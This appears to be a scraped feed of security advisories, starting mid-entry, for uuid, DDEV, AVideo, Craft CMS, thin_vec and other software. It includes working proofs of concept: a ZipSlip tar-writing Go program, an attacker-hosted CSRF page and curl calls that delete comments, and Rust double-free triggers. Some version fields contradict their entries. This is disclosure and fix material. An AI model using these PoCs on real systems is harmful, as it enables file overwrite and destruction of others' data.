- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.
- `src/v6.ts` writes `buf[offset + i]` without bounds validation.

### Reproducible PoC

```bash
cd /home/StrawHat/uuid
npm ci
npm run build
node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"
```

Observed:

- `v4 THREW RangeError`
- `v5 NO_THROW`
- `v6 NO_THROW`

Example partial overwrite evidence captured during audit:

```text
same true
buf [ 170, 170, 170, 170, 75, 224, 100, 63 ]
v6 [ 187, 187, 187, 187, 31, 19, 185, 64 ]
```

### Security impact

- **Primary**: integrity/robustness issue (silent partial output).
- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.
- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.

### Suggested fix

Add the same guard used by `v4`/`v1`/`v7`:

```ts
if (offset < 0 || offset + 16 > buf.length) {
  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
}
```

Apply to:

- `src/v35.ts` (covers `v3` and `v5`)
- `src/v6.ts`
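The partial-write failure mode and the guard, reproduced as an added Go example rather than the uuid package's own TypeScript: Go's `copy` stops at the shorter slice exactly as the unguarded `buf[offset + i]` loop stops at the end of a `Uint8Array`, so an 8-byte buffer at offset 4 silently receives only the first four bytes. `sampleID` is a constructed 16-byte value standing in for a generated UUID; `writeUnchecked` and `writeChecked` are this example's names.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
)

var ErrRange = errors.New("UUID byte range is out of buffer bounds")

// Constructed sample value standing in for a generated UUID.
var sampleID = [16]byte{
	0x6b, 0xa7, 0xb8, 0x10, 0x9d, 0xad, 0x11, 0xd1,
	0x80, 0xb4, 0x00, 0xc0, 0x4f, 0xd4, 0x30, 0xc8,
}

// writeUnchecked mirrors the v3/v5/v6 behaviour: bytes are copied until the
// buffer runs out and the caller is never told how many landed.
func writeUnchecked(buf []byte, offset int, id [16]byte) int {
	if offset < 0 || offset > len(buf) {
		return 0 // slicing would panic; nothing written
	}
	return copy(buf[offset:], id[:]) // silent truncation when fewer than 16 bytes remain
}

// writeChecked applies the guard the v4/v1/v7 paths already have: either all
// 16 bytes fit, or nothing is written and an error is returned.
func writeChecked(buf []byte, offset int, id [16]byte) error {
	if offset < 0 || offset+16 > len(buf) {
		return fmt.Errorf("%w: %d:%d, buffer length %d", ErrRange, offset, offset+15, len(buf))
	}
	copy(buf[offset:offset+16], id[:])
	return nil
}

// demo fills two 8-byte buffers with 0xAA and attempts both writes at offset 4.
// It returns the unchecked byte count and buffer, then the checked buffer and error.
func demo() (n int, unchecked []byte, checked []byte, err error) {
	unchecked = bytes.Repeat([]byte{0xAA}, 8)
	n = writeUnchecked(unchecked, 4, sampleID)
	checked = bytes.Repeat([]byte{0xAA}, 8)
	err = writeChecked(checked, 4, sampleID)
	return n, unchecked, checked, err
}

func main() {
	n, unchecked, checked, err := demo()
	fmt.Printf("unchecked: copied %d of 16 bytes, buffer now % x\n", n, unchecked)
	fmt.Printf("checked:   err=%v, buffer untouched % x\n", err, checked)
}
```

The point for API authors is consistency: once some code paths reject an out-of-range write, callers will assume all of them do, and the one path that silently truncates becomes the bug nobody tests for.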
Affected versions
11.0.0 - 11.1.1
Vulnerability type
CWE-787 — Out-of-bounds Write
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
## Summary

Device-Paired Node Skips Node Scope Gate → Host RCE.md

## Current Maintainer Triage

- Status: open
- Normalized severity: high
- Assessment: Real in shipped v2026.3.28 because a merely device-paired node could expose node commands without node pairing, but high is sufficient given the pairing/setup prerequisites.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `3886b65ef21d02808c1a106fa1f9f69e22f71c32` — 2026-03-30T17:29:28+01:00

OpenClaw thanks @AntAISecurityLab for reporting.
Affected versions
2026.3.31
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Full description
OpenClaw before 2026.3.31 contains a decompression bomb vulnerability in image processing that fails to properly enforce pixel-limit guards on sips. Attackers can exploit this by uploading oversized images to cause denial of service through excessive memory consumption.
Affected versions
2026.3.31
Vulnerability type
CWE-636 — CWE-636
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Full description
OpenLearn is open-source educational forum software. Prior to commit 844b2a40a69d0c4911580fe501923f0b391313ab, when `safeMode` is enabled, unapproved forum posts are hidden from the public list, but the direct post-read procedure still returns the full post to anyone with the post UUID. Commit 844b2a40a69d0c4911580fe501923f0b391313ab fixes the issue.
Affected versions
2026-04-14
Vulnerability type
CWE-284 — CWE-284
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
The printenv utility in uutils coreutils fails to display environment variables containing invalid UTF-8 byte sequences. While POSIX permits arbitrary bytes in environment strings, the uutils implementation silently skips these entries rather than printing the raw bytes. This vulnerability allows malicious environment variables (e.g., adversarial LD_PRELOAD values) to evade inspection by administrators or security auditing tools, potentially allowing library injection or other environment-based attacks to go undetected.
Vulnerability type
CWE-754 — CWE-754
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Full description
## Summary

The DDEV local dev tool has unsanitized extraction in both `Untar()` and `Unzip()` functions in `pkg/archive/archive.go`. This flaw allows users to download and extract archives from remote sources without path validation.

## Vulnerable Code

`pkg/archive/archive.go:235` (Untar):

```go
fullPath := filepath.Join(dest, file.Name) // NO SANITIZATION
```

`pkg/archive/archive.go:342` (Unzip):

```go
fullPath := filepath.Join(dest, file.Name) // NO SANITIZATION
```

Both functions create directories via `os.MkdirAll` and files via `os.Create` using the unsanitized path.

## Impact

DDEV is a local development tool that downloads and extracts archives from remote sources (add-ons, updates). A malicious archive therefore yields an arbitrary file write on the developer's machine.

## Proof of Concept

```go
package main

// PoC: ddev/ddev CWE-22 — ZipSlip in tar archive extraction
// Replicates the exact pattern from pkg/archive/archive.go:235 (Untar)
// and pkg/archive/archive.go:342 (Unzip) — both use filepath.Join(dest, name)
// without verifying the result stays under the destination directory.

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
	"os"
	"path/filepath"
)

// Vulnerable extraction — mirrors pkg/archive/archive.go:235
func untarVulnerable(dst string, r io.Reader) error {
	tr := tar.NewReader(r)
	for {
		header, err := tr.Next()
		if err == io.EOF {
			break
		}
		if err != nil {
			return err
		}
		// VULNERABLE: identical to archive.go:235
		// fullPath := filepath.Join(dest, file.Name)
		fullPath := filepath.Join(dst, header.Name)
		switch header.Typeflag {
		case tar.TypeDir:
			os.MkdirAll(fullPath, 0755)
		case tar.TypeReg:
			os.MkdirAll(filepath.Dir(fullPath), 0755)
			f, _ := os.Create(fullPath)
			io.Copy(f, tr)
			f.Close()
		}
	}
	return nil
}

func main() {
	// Build malicious tar with traversal entry
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	payload := []byte("# PoC: ddev/ddev CWE-22 path traversal\n")
	tw.WriteHeader(&tar.Header{
		Name: "../../../../../../tmp/ddev_cwe22_poc",
		Mode: 0644,
		Size: int64(len(payload)),
	})
	tw.Write(payload)
	tw.Close()

	// Extract into temp directory
	extractDir, _ := os.MkdirTemp("", "ddev-poc-*")
	defer os.RemoveAll(extractDir)
	untarVulnerable(extractDir, &buf)

	// Verify escape
	escaped := "/tmp/ddev_cwe22_poc"
	if data, err := os.ReadFile(escaped); err == nil {
		fmt.Printf("[!!!] VULNERABLE — file written to: %s\n", escaped)
		fmt.Printf("[!!!] Content: %s", string(data))
		os.Remove(escaped)
	} else {
		fmt.Println("[OK] Not vulnerable")
	}
}
```

Output:

```
[!!!] VULNERABLE — file written to: /tmp/ddev_cwe22_poc
[!!!] Content: # PoC: ddev/ddev CWE-22 path traversal
```

> **Note:** Both `Untar` (archive.go:235) and `Unzip` (archive.go:342) use the same `filepath.Join(dest, file.Name)` pattern without containment checks. This PoC demonstrates the tar path; the zip path is analogously exploitable.

## Suggested Fix

Add path containment check in both Untar and Unzip functions.

## Credit

Kai Aizen (SnailSploit) — Adversarial AI & Security Research
Affected versions
< 1.25.2
Vulnerability type
CWE-22 — Path Traversal
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Full description
## Summary

The `actionSavePermissions()` endpoint allows a user with only `viewUsers` permission to remove arbitrary users from all user groups. While `_saveUserGroups()` enforces per-group authorization for additions, it performs no equivalent authorization check for removals, so submitting an empty `groups` value removes all existing group memberships.

## Affected Versions

- Craft CMS 5.6.0 through 5.9.14 (latest release at time of report)
- Regression introduced in 5.6.0 when the `viewUsers` permission was added
- Prior to 5.6.0, `editedUser()` required `editUsers`, which implicitly protected this endpoint
- Requires Pro edition or higher (the vulnerable code path is gated by `CmsEdition::Pro`)

## Vulnerability Details

### Root Cause

This is a **regression** introduced in Craft CMS 5.6.0 when the `viewUsers` permission was added. Before that change, `editedUser()` required `editUsers` permission for accessing other users' data, which implicitly protected `actionSavePermissions()`. After the change, `actionSavePermissions()` became reachable for users with read-only access to other users, but the underlying group-saving logic still lacked authorization for group removals.

The vulnerability has two components:

1. **`actionSavePermissions()` reachable with read-only access**: The action only requires a control panel request and delegates to `editedUser()`, which now only checks `viewUsers` — a permission explicitly documented as "read-only access to user elements."
2. **Asymmetric authorization in `_saveUserGroups()`**: The method checks `assignUserGroup` permission only when **adding** a user to a new group. When the `groups` parameter is an empty string (resulting in an empty array), the loop is skipped entirely, no authorization checks are run, and all group memberships are removed.

### Prerequisites

- Attacker has a control panel account with `accessCp` and `viewUsers` permissions only
- Target user belongs to one or more user groups that grant additional permissions
- Pro edition or higher

### Attack Steps

1. Attacker authenticates to the Control Panel
2. Attacker sends a POST request to `actions/users/save-permissions` with:
   - `userId` = target user's ID
   - `groups` = "" (empty string)
3. All group memberships for the target user are removed
4. All permissions inherited from those groups are immediately revoked

### Impact

- **Privilege revocation**: An attacker can strip group-based permissions from arbitrary users, including accounts whose effective access derives from group membership
- **Denial of access**: Users lose access to sections, volumes, and features that were granted through group membership
- **Bypass of elevated session requirement**: Group removal does not trigger `requireElevatedSession()` (which is only triggered when new groups are added)
Affected versions
5.6.0, 5.6.0.1, 5.6.0.2, 5.6.1, 5.6.10
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
## Summary

`objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim's `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page.

## Details

### Vulnerable endpoint: `objects/commentDelete.json.php`

```php
// objects/commentDelete.json.php:1-35
<?php
header('Content-Type: application/json');
global $global, $config;
if (!isset($global['systemRootPath'])) {
    require_once '../videos/configuration.php';
}
require_once $global['systemRootPath'] . 'objects/comment.php';

$obj = new stdClass();
$obj->error = true;
$obj->msg = '';
$obj->id = intval(@$_REQUEST['id']);          // <-- GET or POST
$obj->status = false;

if (empty($obj->id)) {
    $obj->id = intval(@$_REQUEST['comments_id']);
}
if (empty($obj->id)) {
    $obj->msg = __("ID can not be empty");
    die(_json_encode($obj));
}

$objC = new Comment("", 0, $obj->id);
$obj->videos_id = $objC->getVideos_id();
$obj->status = $objC->delete();               // <-- destructive action, no CSRF check
...
```

No `forbidIfIsUntrustedRequest()`, no `verifyToken()`, no token/nonce parameter, no `Origin`/`Referer` validation. The handler accepts `$_REQUEST`, so the request may be delivered as `GET` (e.g. via `<img src>`) or `POST` (e.g. via an auto-submitting form / `fetch`).

### Authorization inside `Comment::delete()` does not stop CSRF

```php
// objects/comment.php:147-159
public function delete() {
    if (!self::userCanAdminComment($this->id)) {
        return false;
    }
    ...
    $sql = "DELETE FROM comments WHERE id = ?";
    ...
    return sqlDAL::writeSql($sql, "i", [$this->id]);
}

// objects/comment.php:316-332
public static function userCanAdminComment($comments_id) {
    if (!User::isLogged()) {
        return false;
    }
    if (Permissions::canAdminComment()) {
        return true;   // site moderator
    }
    $obj = new Comment("", 0, $comments_id);
    if ($obj->users_id == User::getId()) {
        return true;   // comment owner
    }
    $video = new Video("", "", $obj->videos_id);
    if ($video->getUsers_id() == User::getId()) {
        return true;   // video owner
    }
    return false;
}
```

This check is exactly what CSRF abuses: it asks "is the session user allowed to delete this comment?" In a CSRF attack, the session user is the victim, and yes — the victim is allowed. So the check grants the request.

### Site-wide cookie policy makes cross-site delivery reliable

```php
// objects/include_config.php:139-146
if ($isHTTPS) {
    // SameSite=None is intentional: AVideo supports cross-origin iframe embedding
    // where users must stay authenticated (e.g. video players on third-party sites).
    // Setting Lax would break that use case. All state-mutating endpoints that are
    // vulnerable to CSRF must instead enforce a short-lived globalToken (verifyToken).
    ini_set('session.cookie_samesite', 'None');
    ini_set('session.cookie_secure', '1');
}
```

The in-source comment is explicit: because AVideo intentionally opts out of SameSite protection, every state-mutating endpoint is responsible for its own CSRF defense. `commentDelete.json.php` forgets to apply it.

The canonical example that does get it right is `objects/userUpdate.json.php:18`:

```php
// objects/userUpdate.json.php:13-18
if (!User::isLogged()) {
    $obj->msg = __("Is not logged");
    die(json_encode($obj));
}
forbidIfIsUntrustedRequest();   // <-- what commentDelete.json.php is missing
```

A repository-wide grep for `forbidIfIsUntrustedRequest` yields only `objects/userUpdate.json.php` and the function definition itself — no shared middleware exists, and no bootstrap in `configuration.php` / `include_config.php` wraps endpoints with a CSRF check.

### Attacker model / victim value

- **Site moderators** (any account with `Permissions::canAdminComment()`): full-site comment deletion oracle.
- **Video creators** (channel owners): deletion oracle for every comment on their own videos.
- **Comment authors**: only their own comments (self-DoS, low value).

The first two classes make this a real integrity/availability attack on community content.

## PoC

Assume the target AVideo instance runs at `https://victim.example.com` and the victim is a logged-in moderator (or any video owner). The attacker hosts:

```html
<!-- https://attacker.example/mass-delete.html -->
<!doctype html>
<html><body>
<h1>Cute kittens</h1>

<!-- GET variant (works because the endpoint uses $_REQUEST): -->
<img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=1" style="display:none">
<img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=2" style="display:none">
<img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=3" style="display:none">
<!-- ... up to N -->

<!-- POST variant (same result, reaches the POST code path the legit UI uses): -->
<script>
for (let i = 1; i <= 10000; i++) {
  fetch("https://victim.example.com/objects/commentDelete.json.php", {
    method: "POST",
    credentials: "include",
    headers: {"Content-Type": "application/x-www-form-urlencoded"},
    body: "comments_id=" + i
  });
}
</script>
</body></html>
```

Manual verification of the server-side handler with the victim's own cookie (demonstrates that the endpoint itself performs the delete with no token):

```bash
# 1. Log in as a moderator and capture PHPSESSID
curl -c cookies.txt -d 'user=moderator&pass=pass' \
  https://victim.example.com/objects/userLogin.json.php

# 2. Call the endpoint with nothing but the session cookie and a comments_id.
#    No CSRF token, no Referer/Origin matching the site.
curl -b cookies.txt \
  -H 'Origin: https://attacker.example' \
  -H 'Referer: https://attacker.example/mass-delete.html' \
  'https://victim.example.com/objects/commentDelete.json.php?comments_id=1'
# -> {"error":false,"msg":"","id":1,"status":true,"videos_id":...}
```

The `{"status":true,"error":false}` response confirms the row was deleted; compare with `objects/userUpdate.json.php` under the same Origin/Referer, which returns the "Invalid Request" forbidden page from `forbidIfIsUntrustedRequest()`.

## Impact

- Cross-site mass deletion of comments.
- Against a site moderator (`Permissions::canAdminComment()`), the attacker can permanently delete every comment on the platform — a severe content-integrity and availability hit on the community layer.
- Against any channel owner, the attacker can wipe all discussion under that creator's videos, a targeted reputation / engagement attack (e.g., silence dissent, silence evidence of prior posts).
- The attack only requires luring a logged-in victim to any page that can fetch/embed/submit — a forum post, a compromised ad, a link in email, a rogue embed.
- No credential compromise is required; the attack does not leak data, but it destroys it.
- Because SameSite=None is a deliberate, documented product decision, browser-side defenses do not intervene.

## Recommended Fix

Apply the project's own prescribed CSRF pattern to the handler. Two layers are appropriate:

1. Require an authenticated session and reject untrusted-origin requests (same treatment as `userUpdate.json.php`).
2. Restrict the method to `POST` so drive-by `<img>` and navigational `GET` deliveries cannot reach the sink.

```php
// objects/commentDelete.json.php
<?php
header('Content-Type: application/json');
global $global, $config;
if (!isset($global['systemRootPath'])) {
    require_once '../videos/configuration.php';
}
require_once $global['systemRootPath'] . 'objects/comment.php';

// --- added CSRF defense ---
if (!User::isLogged()) {
    die(_json_encode((object)['error' => true, 'msg' => __('Is not logged')]));
}
forbidIfIsUntrustedRequest();                   // Referer/Origin gate
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {    // no $_REQUEST drive-by
    die(_json_encode((object)['error' => true, 'msg' => 'POST required']));
}
// --- end added ---

$obj = new stdClass();
$obj->error = true;
$obj->msg = '';
$obj->id = intval(@$_POST['id']);
$obj->status = false;
if (empty($obj->id)) {
    $obj->id = intval(@$_POST['comments_id']);
}
...
```

Stronger (recommended): also require a short-lived global token via `verifyToken()` as the in-source comment in `objects/include_config.php` prescribes, and audit every other `objects/*.json.php` handler that performs a write — the same omission likely affects additional endpoints and should be handled project-wide, ideally through a shared bootstrap that enforces `forbidIfIsUntrustedRequest()` for any `json.php` that mutates state.
Affected versions
29.0
Vulnerability type
CWE-352 — CSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
Full description
In NTFS-3G 2022.10.3 before 2026.2.25, a heap buffer overflow exists in ntfs_build_permissions_posix() in acls.c that allows an attacker to corrupt heap memory in the SUID-root ntfs-3g binary by crafting a malicious NTFS image. The overflow is triggered on the READ path (stat, readdir, open) when processing a security descriptor with multiple ACCESS_DENIED ACEs containing WRITE_OWNER from distinct group SIDs.
Vulnerability type
CWE-122 — CWE-122
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References
https://github.com/tuxera/ntfs-3g/releases/tag/2026.2.25
https://github.com/tuxera/ntfs-3g/security/advisories/GHSA-4cwv-5285-63v9
https://www.openwall.com/lists/oss-security/2026/04/21/4
http://www.openwall.com/lists/oss-security/2026/04/21/4
https://lists.debian.org/debian-lts-announce/2026/04/msg00024.html
Full description
follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. Prior to 1.16.0, when an HTTP request follows a cross-domain redirect (301/302/307/308), follow-redirects only strips authorization, proxy-authorization, and cookie headers (matched by regex at index.js). Any custom authentication header (e.g., X-API-Key, X-Auth-Token, Api-Key, Token) is forwarded verbatim to the redirect target. This vulnerability is fixed in 1.16.0.
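What a redirect hop should do with request headers, as an added example in Node.js that is not follow-redirects' own code: `headersForRedirect` drops the three headers the library already strips together with any header whose name looks like a credential, but only when the redirect leaves the origin (scheme, host and port) of the original request. The header set, URLs and the credential-name pattern are constructed for this illustration; the pattern is an assumption, not the library's matching rule.

```javascript
// Added example, not follow-redirects code: header hygiene on redirects.

// Headers follow-redirects already removes on a cross-domain redirect.
const SENSITIVE_EXACT = new Set(['authorization', 'proxy-authorization', 'cookie']);
// Assumed pattern for custom credential headers (X-API-Key, X-Auth-Token, Api-Key, Token ...).
// Deliberately broad: dropping one benign header on a redirect is cheaper than leaking a key.
const SENSITIVE_PATTERN = /(api[-_]?key|auth|token|secret|credential|session)/i;

function isSensitiveHeader(name) {
  const n = name.toLowerCase();
  return SENSITIVE_EXACT.has(n) || SENSITIVE_PATTERN.test(n);
}

// Origin comparison catches host changes and https->http downgrades alike.
function sameOrigin(fromUrl, toUrl) {
  return new URL(fromUrl).origin === new URL(toUrl).origin;
}

// Returns the headers to send to `toUrl` and the names that were withheld.
function headersForRedirect(headers, fromUrl, toUrl) {
  const kept = {};
  const dropped = [];
  const crossOrigin = !sameOrigin(fromUrl, toUrl);
  for (const [name, value] of Object.entries(headers)) {
    if (crossOrigin && isSensitiveHeader(name)) dropped.push(name);
    else kept[name] = value;
  }
  return { kept, dropped };
}

// Constructed request headers, including the custom names the advisory lists.
const SAMPLE_HEADERS = {
  'Authorization': 'Bearer constructed-token',
  'X-API-Key': 'constructed-key',
  'X-Auth-Token': 'constructed-auth',
  'Cookie': 'sid=constructed',
  'Content-Type': 'application/json',
  'User-Agent': 'redirect-demo/1.0',
};

// Three hops: to another host, to the same host over plain http, and within the origin.
function demo() {
  const from = 'https://api.example.com/v1/items';
  return {
    crossOrigin: headersForRedirect(SAMPLE_HEADERS, from, 'https://cdn.other.example/items'),
    downgrade:   headersForRedirect(SAMPLE_HEADERS, from, 'http://api.example.com/v1/items'),
    sameOrigin:  headersForRedirect(SAMPLE_HEADERS, from, 'https://api.example.com/v2/items'),
  };
}
```

This is stricter than a domain comparison: a redirect from `api.example.com` to another subdomain also loses the credential headers here. Applications that must keep a key across such hops should re-attach it explicitly for the destinations they trust rather than rely on the client forwarding everything.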
Affected versions
1.16.0
Vulnerability type
CWE-200 — Info Disclosure
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description
FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.215, the reply and draft flows trust client-supplied encrypted attachment IDs. Any IDs present in `attachments_all[]` but omitted from retained lists are decrypted and passed directly to `Attachment::deleteByIds()`. Because `load_attachments` returns encrypted IDs for attachments on a visible conversation, a mailbox peer can replay those IDs through `save_draft` and delete the original attachment row and file. Version 1.8.215 fixes the vulnerability.
Vulnerability type
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
Full description
CrowdStrike has released security updates to address a critical unauthenticated path traversal vulnerability (CVE-2026-40050) in LogScale. This vulnerability only requires mitigation by customers that host specific versions of LogScale and does not affect Next-Gen SIEM customers. The vulnerability exists in a specific cluster API endpoint that, if exposed, allows a remote attacker to read arbitrary files from the server filesystem without authentication. Next-Gen SIEM customers are not affected and do not need to take any action. CrowdStrike mitigated the vulnerability for LogScale SaaS customers by deploying network-layer blocks to all clusters on April 7, 2026. We have proactively reviewed all log data and there is no evidence of exploitation. LogScale Self-hosted customers should upgrade to a patched version immediately to remediate the vulnerability. CrowdStrike identified this vulnerability during continuous and ongoing product testing.
Vulnerability type
CWE-22 — Path Traversal
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Full description
Vexa is an open-source, self-hostable meeting bot API and meeting transcription API. Prior to 0.10.0-260419-1910, the Vexa transcription-collector service exposes an internal endpoint `GET /internal/transcripts/{meeting_id}` that returns transcript data for any meeting without any authentication or authorization checks. An unauthenticated attacker can enumerate all meeting IDs, access any user's meeting transcripts without credentials, and steal confidential business conversations, passwords, and/or PII. Version 0.10.0-260419-1910 patches the issue.
Affected versions
All versions < 0.10
Vulnerability type
CWE-306 — Auth Bypass
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Full description
OS Command Injection Remote Code Execution Vulnerability in UI in Progress ADC Products allows an authenticated attacker with “All” permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in a custom WAF rule file during the file upload process.
Vulnerability type
CWE-77 — Command Injection
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Full description
### Summary

A **Double Free / Use-After-Free (UAF)** vulnerability has been identified in the `IntoIter::drop` and `ThinVec::clear` implementations of the `thin_vec` crate. Both vulnerabilities share the same root cause and can trigger memory corruption using only safe Rust code — no `unsafe` blocks required. Undefined Behavior has been confirmed via **Miri** and **AddressSanitizer (ASAN)**.

---

### Details

Both vulnerabilities share the same root cause. When a **panic occurs** during sequential element deallocation, the subsequent length cleanup code (`set_len(0)`) is never executed. During stack unwinding, the container is dropped again, causing already-freed memory to be re-freed (Double Free / UAF).

#### Vulnerability 1 — `IntoIter::drop`

**Location:** `thin-vec/src/lib.rs` L.2308~2314

`IntoIter::drop` transfers ownership of the internal buffer via `mem::replace`, then sequentially frees elements via `ptr::drop_in_place`. If a panic occurs during element deallocation, `set_len_non_singleton(0)` is never reached. During unwinding, `vec` is dropped again, re-freeing already-freed elements. The standard library's `std::vec::IntoIter` prevents this with a **DropGuard pattern**, but thin-vec lacks this defense.

```rust
// Problematic structure (conceptual representation)
impl<T> Drop for IntoIter<T> {
    fn drop(&mut self) {
        let mut vec = mem::replace(&mut self.vec, ThinVec::new());
        unsafe {
            ptr::drop_in_place(vec.remaining_slice_mut()); // ← panic may occur here
            vec.set_len_non_singleton(0);                  // ← unreachable on panic
        }
        // During unwinding, vec is dropped again → Double Free
    }
}
```

#### Vulnerability 2 — `ThinVec::clear`

`clear()` calls `ptr::drop_in_place(&mut self[..])` followed by `self.set_len(0)` to reset the length. If a panic occurs during element deallocation, `set_len(0)` is never executed. When the `ThinVec` itself is subsequently dropped, already-freed elements are freed again.

```rust
// Problematic structure (conceptual representation)
pub fn clear(&mut self) {
    unsafe {
        ptr::drop_in_place(&mut self[..]); // ← panic may occur here
        self.set_len(0);                   // ← unreachable on panic
    }
    // ThinVec drop later → Double Free
}
```

#### Recommended Fix

Both vulnerabilities can be resolved with the same pattern:

- **DropGuard pattern:** Insert an RAII guard before `drop_in_place` to guarantee `set_len(0)` is called regardless of panic
- **Pre-zeroing approach:** Set the length to 0 before calling `drop_in_place`

---

### PoC

**Requirements:** Rust nightly toolchain, `thin-vec = "0.2.14"`

```bash
# Miri
cargo +nightly miri run

# ASAN
RUSTFLAGS="-Z sanitizer=address" cargo +nightly run --release
```

#### PoC-1: `IntoIter::drop`

```rust
use thin_vec::ThinVec;

struct PanicBomb(String);

impl Drop for PanicBomb {
    fn drop(&mut self) {
        if self.0 == "panic" {
            panic!("panic!");
        }
        println!("Dropping: {}", self.0);
    }
}

fn main() {
    let mut v = ThinVec::new();
    v.push(PanicBomb(String::from("normal1")));
    v.push(PanicBomb(String::from("panic"))); // trigger element
    v.push(PanicBomb(String::from("normal2")));

    let mut iter = v.into_iter();
    iter.next();
    // When iter is dropped: panic occurs at "panic" element
    // → During unwinding, Double Drop is triggered on "normal1" (already freed)
}
```

**Miri output:**

```
error: Undefined Behavior: pointer not dereferenceable: alloc227 has been freed, so this pointer is dangling
stack backtrace:
   3: <PanicBomb as Drop>::drop                          ← Double Drop entry
   6: <ThinVec<T> as Drop>::drop::drop_non_singleton
   9: <IntoIter<T> as Drop>::drop::drop_non_singleton   ← lib.rs:2310 (root cause)
```

**ASAN output:**

```
==66150==ERROR: AddressSanitizer: heap-use-after-free on address 0x7afa685e0010
READ of size 7 at 0x7afa685e0010
    #0 memcpy
    #4 drop_in_place::<PanicBomb>                    ← Double Drop entry point
    #5 <ThinVec as Drop>::drop::drop_non_singleton
    #6 <IntoIter as Drop>::drop::drop_non_singleton
```

#### PoC-2: `ThinVec::clear`

```rust
use thin_vec::ThinVec;
use std::panic;

struct Poison(Box<usize>, &'static str);

impl Drop for Poison {
    fn drop(&mut self) {
        if self.1 == "panic" {
            panic!("panic!");
        }
        println!("Dropping: {}", self.0);
    }
}

fn main() {
    let mut v = ThinVec::new();
    v.push(Poison(Box::new(1), "normal1")); // index 0
    v.push(Poison(Box::new(2), "panic"));   // index 1 → panic triggered here
    v.push(Poison(Box::new(3), "normal2")); // index 2

    let _ = panic::catch_unwind(panic::AssertUnwindSafe(|| {
        v.clear();
        // panic occurs at "panic" element during clear()
        // → set_len(0) is never called
        // → already-freed elements are re-freed when v goes out of scope
    }));
}
```

---

### Impact

**Vulnerability classification:**

- CWE-415: Double Free
- CWE-416: Use-After-Free

**Affected code:** All code satisfying the following conditions simultaneously:

1. `ThinVec` stores heap-owning types (`String`, `Vec`, `Box`, etc.)
